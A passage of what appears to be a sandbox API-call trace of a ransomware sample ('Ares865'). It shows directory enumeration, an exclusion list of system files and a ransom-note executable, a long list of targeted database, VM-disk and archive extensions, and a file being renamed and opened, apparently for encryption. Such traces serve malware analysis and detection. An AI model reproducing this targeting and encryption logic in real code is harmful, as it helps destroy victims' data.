dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0081.893] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0081.893] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0081.893] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0081.893] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.893] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0081.893] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0081.893] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0081.893] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0081.893] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2576a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0081.893] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0081.893] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a127460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1c821ca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x29a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="aoldtz.exe") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="bootmgr") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="temp") returned -1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="pagefile.sys") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="boot") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="ids.txt") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="perflogs") returned 1 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2="MSBuild") returned 1 [0081.893] lstrlenW (lpString="state.rsm") returned 9 [0081.893] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*") returned 73 [0081.893] lstrcpyW (in: lpString1=0x2cce490, lpString2="state.rsm" | out: lpString1="state.rsm") returned="state.rsm" [0081.893] lstrlenW (lpString="state.rsm") returned 9 [0081.893] lstrlenW (lpString="Ares865") returned 7 [0081.893] lstrcmpiW (lpString1="ate.rsm", lpString2="Ares865") returned 1 [0081.893] lstrlenW (lpString=".dll") returned 4 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2=".dll") returned 1 [0081.893] lstrlenW (lpString=".lnk") returned 4 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2=".lnk") returned 1 [0081.893] lstrlenW (lpString=".ini") returned 4 [0081.893] lstrcmpiW (lpString1="state.rsm", lpString2=".ini") returned 1 [0081.893] lstrlenW (lpString=".sys") returned 4 [0081.894] lstrcmpiW (lpString1="state.rsm", lpString2=".sys") returned 1 [0081.894] lstrlenW (lpString="state.rsm") returned 9 [0081.894] lstrlenW (lpString="bak") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="bak") returned 1 [0081.894] lstrlenW (lpString="ba_") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="ba_") returned 1 [0081.894] lstrlenW (lpString="dbb") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="dbb") returned 1 [0081.894] lstrlenW (lpString="vmdk") returned 4 [0081.894] lstrcmpiW (lpString1=".rsm", lpString2="vmdk") returned -1 [0081.894] lstrlenW (lpString="rar") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="rar") returned 1 [0081.894] lstrlenW (lpString="zip") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="zip") returned -1 [0081.894] lstrlenW (lpString="tgz") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="tgz") returned -1 [0081.894] lstrlenW (lpString="vbox") returned 4 [0081.894] lstrcmpiW (lpString1=".rsm", lpString2="vbox") returned -1 [0081.894] lstrlenW (lpString="vdi") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="vdi") returned -1 [0081.894] lstrlenW (lpString="vhd") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="vhd") returned -1 [0081.894] lstrlenW (lpString="vhdx") returned 4 [0081.894] lstrcmpiW (lpString1=".rsm", lpString2="vhdx") returned -1 [0081.894] lstrlenW (lpString="avhd") returned 4 [0081.894] lstrcmpiW (lpString1=".rsm", lpString2="avhd") returned -1 [0081.894] lstrlenW (lpString="db") returned 2 [0081.894] lstrcmpiW (lpString1="sm", lpString2="db") returned 1 [0081.894] lstrlenW (lpString="db2") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="db2") returned 1 [0081.894] lstrlenW (lpString="db3") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="db3") returned 1 [0081.894] lstrlenW (lpString="dbf") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="dbf") returned 1 [0081.894] lstrlenW (lpString="mdf") returned 3 [0081.894] lstrcmpiW (lpString1="rsm", lpString2="mdf") returned 1 [0081.895] lstrlenW (lpString="mdb") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="mdb") returned 1 [0081.895] lstrlenW (lpString="sql") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="sql") returned -1 [0081.895] lstrlenW (lpString="sqlite") returned 6 [0081.895] lstrcmpiW (lpString1="te.rsm", lpString2="sqlite") returned 1 [0081.895] lstrlenW (lpString="sqlite3") returned 7 [0081.895] lstrcmpiW (lpString1="ate.rsm", lpString2="sqlite3") returned -1 [0081.895] lstrlenW (lpString="sqlitedb") returned 8 [0081.895] lstrcmpiW (lpString1="tate.rsm", lpString2="sqlitedb") returned 1 [0081.895] lstrlenW (lpString="xml") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="xml") returned -1 [0081.895] lstrlenW (lpString="$er") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="$er") returned 1 [0081.895] lstrlenW (lpString="4dd") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="4dd") returned 1 [0081.895] lstrlenW (lpString="4dl") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="4dl") returned 1 [0081.895] lstrlenW (lpString="^^^") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="^^^") returned 1 [0081.895] lstrlenW (lpString="abs") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="abs") returned 1 [0081.895] lstrlenW (lpString="abx") returned 3 [0081.895] lstrcmpiW (lpString1="rsm", lpString2="abx") returned 1 [0081.895] lstrlenW (lpString="accdb") returned 5 [0081.895] lstrcmpiW (lpString1="e.rsm", lpString2="accdb") returned 1 [0081.895] lstrlenW (lpString="accdc") returned 5 [0081.895] lstrcmpiW (lpString1="e.rsm", lpString2="accdc") returned 1 [0081.895] lstrlenW (lpString="accde") returned 5 [0081.895] lstrcmpiW (lpString1="e.rsm", lpString2="accde") returned 1 [0081.895] lstrlenW (lpString="accdr") returned 5 [0081.895] lstrcmpiW (lpString1="e.rsm", lpString2="accdr") returned 1 [0081.895] lstrlenW (lpString="accdt") returned 5 [0081.895] lstrcmpiW (lpString1="e.rsm", lpString2="accdt") returned 1 [0081.895] lstrlenW (lpString="accdw") returned 5 [0081.895] lstrcmpiW (lpString1="e.rsm", lpString2="accdw") returned 1 [0081.895] lstrlenW (lpString="accft") returned 5 [0081.895] lstrcmpiW (lpString1="e.rsm", lpString2="accft") returned 1 [0081.895] lstrlenW (lpString="adb") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0081.896] lstrlenW (lpString="adb") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0081.896] lstrlenW (lpString="ade") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="ade") returned 1 [0081.896] lstrlenW (lpString="adf") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="adf") returned 1 [0081.896] lstrlenW (lpString="adn") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="adn") returned 1 [0081.896] lstrlenW (lpString="adp") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="adp") returned 1 [0081.896] lstrlenW (lpString="alf") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="alf") returned 1 [0081.896] lstrlenW (lpString="ask") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="ask") returned 1 [0081.896] lstrlenW (lpString="btr") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="btr") returned 1 [0081.896] lstrlenW (lpString="cat") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="cat") returned 1 [0081.896] lstrlenW (lpString="cdb") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="cdb") returned 1 [0081.896] lstrlenW (lpString="ckp") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="ckp") returned 1 [0081.896] lstrlenW (lpString="cma") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="cma") returned 1 [0081.896] lstrlenW (lpString="cpd") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="cpd") returned 1 [0081.896] lstrlenW (lpString="dacpac") returned 6 [0081.896] lstrcmpiW (lpString1="te.rsm", lpString2="dacpac") returned 1 [0081.896] lstrlenW (lpString="dad") returned 3 [0081.896] lstrcmpiW (lpString1="rsm", lpString2="dad") returned 1 [0081.896] lstrlenW (lpString="dadiagrams") returned 10 [0081.896] lstrlenW (lpString="daschema") returned 8 [0081.896] lstrcmpiW (lpString1="tate.rsm", lpString2="daschema") returned 1 [0081.896] lstrlenW (lpString="db-journal") returned 10 [0081.896] lstrlenW (lpString="db-shm") returned 6 [0081.896] lstrcmpiW (lpString1="te.rsm", lpString2="db-shm") returned 1 [0081.896] lstrlenW (lpString="db-wal") returned 6 [0081.896] lstrcmpiW (lpString1="te.rsm", lpString2="db-wal") returned 1 [0081.897] lstrlenW (lpString="dbc") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dbc") returned 1 [0081.897] lstrlenW (lpString="dbs") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dbs") returned 1 [0081.897] lstrlenW (lpString="dbt") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dbt") returned 1 [0081.897] lstrlenW (lpString="dbv") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dbv") returned 1 [0081.897] lstrlenW (lpString="dbx") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dbx") returned 1 [0081.897] lstrlenW (lpString="dcb") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dcb") returned 1 [0081.897] lstrlenW (lpString="dct") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dct") returned 1 [0081.897] lstrlenW (lpString="dcx") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dcx") returned 1 [0081.897] lstrlenW (lpString="ddl") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="ddl") returned 1 [0081.897] lstrlenW (lpString="dlis") returned 4 [0081.897] lstrcmpiW (lpString1=".rsm", lpString2="dlis") returned -1 [0081.897] lstrlenW (lpString="dp1") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dp1") returned 1 [0081.897] lstrlenW (lpString="dqy") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dqy") returned 1 [0081.897] lstrlenW (lpString="dsk") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dsk") returned 1 [0081.897] lstrlenW (lpString="dsn") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dsn") returned 1 [0081.897] lstrlenW (lpString="dtsx") returned 4 [0081.897] lstrcmpiW (lpString1=".rsm", lpString2="dtsx") returned -1 [0081.897] lstrlenW (lpString="dxl") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="dxl") returned 1 [0081.897] lstrlenW (lpString="eco") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="eco") returned 1 [0081.897] lstrlenW (lpString="ecx") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="ecx") returned 1 [0081.897] lstrlenW (lpString="edb") returned 3 [0081.897] lstrcmpiW (lpString1="rsm", lpString2="edb") returned 1 [0081.897] lstrlenW (lpString="epim") returned 4 [0081.898] lstrcmpiW (lpString1=".rsm", lpString2="epim") returned -1 [0081.898] lstrlenW (lpString="fcd") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fcd") returned 1 [0081.898] lstrlenW (lpString="fdb") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fdb") returned 1 [0081.898] lstrlenW (lpString="fic") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fic") returned 1 [0081.898] lstrlenW (lpString="flexolibrary") returned 12 [0081.898] lstrlenW (lpString="fm5") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fm5") returned 1 [0081.898] lstrlenW (lpString="fmp") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fmp") returned 1 [0081.898] lstrlenW (lpString="fmp12") returned 5 [0081.898] lstrcmpiW (lpString1="e.rsm", lpString2="fmp12") returned -1 [0081.898] lstrlenW (lpString="fmpsl") returned 5 [0081.898] lstrcmpiW (lpString1="e.rsm", lpString2="fmpsl") returned -1 [0081.898] lstrlenW (lpString="fol") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fol") returned 1 [0081.898] lstrlenW (lpString="fp3") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fp3") returned 1 [0081.898] lstrlenW (lpString="fp4") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fp4") returned 1 [0081.898] lstrlenW (lpString="fp5") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fp5") returned 1 [0081.898] lstrlenW (lpString="fp7") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fp7") returned 1 [0081.898] lstrlenW (lpString="fpt") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="fpt") returned 1 [0081.898] lstrlenW (lpString="frm") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="frm") returned 1 [0081.898] lstrlenW (lpString="gdb") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0081.898] lstrlenW (lpString="gdb") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0081.898] lstrlenW (lpString="grdb") returned 4 [0081.898] lstrcmpiW (lpString1=".rsm", lpString2="grdb") returned -1 [0081.898] lstrlenW (lpString="gwi") returned 3 [0081.898] lstrcmpiW (lpString1="rsm", lpString2="gwi") returned 1 [0081.898] lstrlenW (lpString="hdb") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="hdb") returned 1 [0081.899] lstrlenW (lpString="his") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="his") returned 1 [0081.899] lstrlenW (lpString="ib") returned 2 [0081.899] lstrcmpiW (lpString1="sm", lpString2="ib") returned 1 [0081.899] lstrlenW (lpString="idb") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="idb") returned 1 [0081.899] lstrlenW (lpString="ihx") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="ihx") returned 1 [0081.899] lstrlenW (lpString="itdb") returned 4 [0081.899] lstrcmpiW (lpString1=".rsm", lpString2="itdb") returned -1 [0081.899] lstrlenW (lpString="itw") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="itw") returned 1 [0081.899] lstrlenW (lpString="jet") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="jet") returned 1 [0081.899] lstrlenW (lpString="jtx") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="jtx") returned 1 [0081.899] lstrlenW (lpString="kdb") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="kdb") returned 1 [0081.899] lstrlenW (lpString="kexi") returned 4 [0081.899] lstrcmpiW (lpString1=".rsm", lpString2="kexi") returned -1 [0081.899] lstrlenW (lpString="kexic") returned 5 [0081.899] lstrcmpiW (lpString1="e.rsm", lpString2="kexic") returned -1 [0081.899] lstrlenW (lpString="kexis") returned 5 [0081.899] lstrcmpiW (lpString1="e.rsm", lpString2="kexis") returned -1 [0081.899] lstrlenW (lpString="lgc") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="lgc") returned 1 [0081.899] lstrlenW (lpString="lwx") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="lwx") returned 1 [0081.899] lstrlenW (lpString="maf") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="maf") returned 1 [0081.899] lstrlenW (lpString="maq") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="maq") returned 1 [0081.899] lstrlenW (lpString="mar") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="mar") returned 1 [0081.899] lstrlenW (lpString="marshal") returned 7 [0081.899] lstrcmpiW (lpString1="ate.rsm", lpString2="marshal") returned -1 [0081.899] lstrlenW (lpString="mas") returned 3 [0081.899] lstrcmpiW (lpString1="rsm", lpString2="mas") returned 1 [0081.900] lstrlenW (lpString="mav") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mav") returned 1 [0081.900] lstrlenW (lpString="maw") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="maw") returned 1 [0081.900] lstrlenW (lpString="mdbhtml") returned 7 [0081.900] lstrcmpiW (lpString1="ate.rsm", lpString2="mdbhtml") returned -1 [0081.900] lstrlenW (lpString="mdn") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mdn") returned 1 [0081.900] lstrlenW (lpString="mdt") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mdt") returned 1 [0081.900] lstrlenW (lpString="mfd") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mfd") returned 1 [0081.900] lstrlenW (lpString="mpd") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mpd") returned 1 [0081.900] lstrlenW (lpString="mrg") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mrg") returned 1 [0081.900] lstrlenW (lpString="mud") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mud") returned 1 [0081.900] lstrlenW (lpString="mwb") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="mwb") returned 1 [0081.900] lstrlenW (lpString="myd") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="myd") returned 1 [0081.900] lstrlenW (lpString="ndf") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="ndf") returned 1 [0081.900] lstrlenW (lpString="nnt") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="nnt") returned 1 [0081.900] lstrlenW (lpString="nrmlib") returned 6 [0081.900] lstrcmpiW (lpString1="te.rsm", lpString2="nrmlib") returned 1 [0081.900] lstrlenW (lpString="ns2") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="ns2") returned 1 [0081.900] lstrlenW (lpString="ns3") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="ns3") returned 1 [0081.900] lstrlenW (lpString="ns4") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="ns4") returned 1 [0081.900] lstrlenW (lpString="nsf") returned 3 [0081.900] lstrcmpiW (lpString1="rsm", lpString2="nsf") returned 1 [0081.900] lstrlenW (lpString="nv") returned 2 [0081.900] lstrcmpiW (lpString1="sm", lpString2="nv") returned 1 [0081.900] lstrlenW (lpString="nv2") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="nv2") returned 1 [0081.901] lstrlenW (lpString="nwdb") returned 4 [0081.901] lstrcmpiW (lpString1=".rsm", lpString2="nwdb") returned -1 [0081.901] lstrlenW (lpString="nyf") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="nyf") returned 1 [0081.901] lstrlenW (lpString="odb") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0081.901] lstrlenW (lpString="odb") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0081.901] lstrlenW (lpString="oqy") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="oqy") returned 1 [0081.901] lstrlenW (lpString="ora") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="ora") returned 1 [0081.901] lstrlenW (lpString="orx") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="orx") returned 1 [0081.901] lstrlenW (lpString="owc") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="owc") returned 1 [0081.901] lstrlenW (lpString="p96") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="p96") returned 1 [0081.901] lstrlenW (lpString="p97") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="p97") returned 1 [0081.901] lstrlenW (lpString="pan") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="pan") returned 1 [0081.901] lstrlenW (lpString="pdb") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="pdb") returned 1 [0081.901] lstrlenW (lpString="pdm") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="pdm") returned 1 [0081.901] lstrlenW (lpString="pnz") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="pnz") returned 1 [0081.901] lstrlenW (lpString="qry") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="qry") returned 1 [0081.901] lstrlenW (lpString="qvd") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="qvd") returned 1 [0081.901] lstrlenW (lpString="rbf") returned 3 [0081.901] lstrcmpiW (lpString1="rsm", lpString2="rbf") returned 1 [0081.901] lstrlenW (lpString="rctd") returned 4 [0081.901] lstrcmpiW (lpString1=".rsm", lpString2="rctd") returned -1 [0081.901] lstrlenW (lpString="rod") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="rod") returned 1 [0081.902] lstrlenW (lpString="rodx") returned 4 [0081.902] lstrcmpiW (lpString1=".rsm", lpString2="rodx") returned -1 [0081.902] lstrlenW (lpString="rpd") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="rpd") returned 1 [0081.902] lstrlenW (lpString="rsd") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="rsd") returned 1 [0081.902] lstrlenW (lpString="sas7bdat") returned 8 [0081.902] lstrcmpiW (lpString1="tate.rsm", lpString2="sas7bdat") returned 1 [0081.902] lstrlenW (lpString="sbf") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="sbf") returned -1 [0081.902] lstrlenW (lpString="scx") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="scx") returned -1 [0081.902] lstrlenW (lpString="sdb") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="sdb") returned -1 [0081.902] lstrlenW (lpString="sdc") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="sdc") returned -1 [0081.902] lstrlenW (lpString="sdf") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="sdf") returned -1 [0081.902] lstrlenW (lpString="sis") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="sis") returned -1 [0081.902] lstrlenW (lpString="spq") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="spq") returned -1 [0081.902] lstrlenW (lpString="te") returned 2 [0081.902] lstrcmpiW (lpString1="sm", lpString2="te") returned -1 [0081.902] lstrlenW (lpString="teacher") returned 7 [0081.902] lstrcmpiW (lpString1="ate.rsm", lpString2="teacher") returned -1 [0081.902] lstrlenW (lpString="tmd") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="tmd") returned -1 [0081.902] lstrlenW (lpString="tps") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="tps") returned -1 [0081.902] lstrlenW (lpString="trc") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0081.902] lstrlenW (lpString="trc") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0081.902] lstrlenW (lpString="trm") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="trm") returned -1 [0081.902] lstrlenW (lpString="udb") returned 3 [0081.902] lstrcmpiW (lpString1="rsm", lpString2="udb") returned -1 [0081.903] lstrlenW (lpString="udl") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="udl") returned -1 [0081.903] lstrlenW (lpString="usr") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="usr") returned -1 [0081.903] lstrlenW (lpString="v12") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="v12") returned -1 [0081.903] lstrlenW (lpString="vis") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="vis") returned -1 [0081.903] lstrlenW (lpString="vpd") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="vpd") returned -1 [0081.903] lstrlenW (lpString="vvv") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="vvv") returned -1 [0081.903] lstrlenW (lpString="wdb") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="wdb") returned -1 [0081.903] lstrlenW (lpString="wmdb") returned 4 [0081.903] lstrcmpiW (lpString1=".rsm", lpString2="wmdb") returned -1 [0081.903] lstrlenW (lpString="wrk") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="wrk") returned -1 [0081.903] lstrlenW (lpString="xdb") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="xdb") returned -1 [0081.903] lstrlenW (lpString="xld") returned 3 [0081.903] lstrcmpiW (lpString1="rsm", lpString2="xld") returned -1 [0081.903] lstrlenW (lpString="xmlff") returned 5 [0081.903] lstrcmpiW (lpString1="e.rsm", lpString2="xmlff") returned -1 [0081.903] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.Ares865") returned 89 [0081.903] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.ares865"), dwFlags=0x1) returned 1 [0081.939] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0081.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=666) returned 1 [0081.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 